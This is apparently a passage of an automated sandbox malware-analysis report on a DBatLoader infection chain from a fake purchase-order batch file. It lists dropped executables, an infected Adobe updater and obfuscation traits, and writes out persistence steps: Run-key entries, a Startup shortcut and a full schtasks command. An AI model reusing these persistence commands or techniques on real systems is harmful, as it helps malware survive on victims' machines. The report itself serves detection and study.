Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: TrojanAIbot.exe.lnk.14.dr LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Static file information: File size 1393123 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: 4.2.x.exe.2e40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: lxsyrsiW.pif.4.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02E5894C
PE file contains an invalid checksum
Source: armsvc.exe.12.dr Static PE information: real checksum: 0x32318 should be: 0x140311
Source: neworigin.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x480db
Source: x.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: server_BTC.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Wisrysxl.PIF.10.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: TrojanAIbot.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x42478
PE file contains sections with non-standard names
Source: alpha.pif.8.dr Static PE information: section name: .didat
Source: armsvc.exe.12.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D2FC push 02E6D367h; ret 4_2_02E6D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E463AE push 02E4640Bh; ret 4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E463B0 push 02E4640Bh; ret 4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6C378 push 02E6C56Eh; ret 4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4C349 push 8B02E4C1h; ret 4_2_02E4C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4332C push eax; ret 4_2_02E43368
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D0AC push 02E6D125h; ret 4_2_02E6D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5306C push 02E530B9h; ret 4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5306B push 02E530B9h; ret 4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D1F8 push 02E6D288h; ret 4_2_02E6D280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D144 push 02E6D1ECh; ret 4_2_02E6D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F108 push ecx; mov dword ptr [esp], edx 4_2_02E5F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E46784 push 02E467C6h; ret 4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E46782 push 02E467C6h; ret 4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4D5A0 push 02E4D5CCh; ret 4_2_02E4D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4C56C push ecx; mov dword ptr [esp], edx 4_2_02E4C571
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6C570 push 02E6C56Eh; ret 4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5AAE0 push 02E5AB18h; ret 4_2_02E5AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58AD8 push 02E58B10h; ret 4_2_02E58B08
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4CA4E push 02E4CD72h; ret 4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4CBEC push 02E4CD72h; ret 4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5886C push 02E588AEh; ret 4_2_02E588A6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02EB4850 push eax; ret 4_2_02EB4920
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56946 push 02E569F3h; ret 4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56948 push 02E569F3h; ret 4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5790C push 02E57989h; ret 4_2_02E57981
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E55E7C push ecx; mov dword ptr [esp], edx 4_2_02E55E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E52F60 push 02E52FD6h; ret 4_2_02E52FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01210C6D push edi; retf 13_2_01210C7A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01210C45 push ebx; retf 13_2_01210C52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499632D push eax; ret 16_2_04996341

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Drops PE files
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_02E5AB1C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
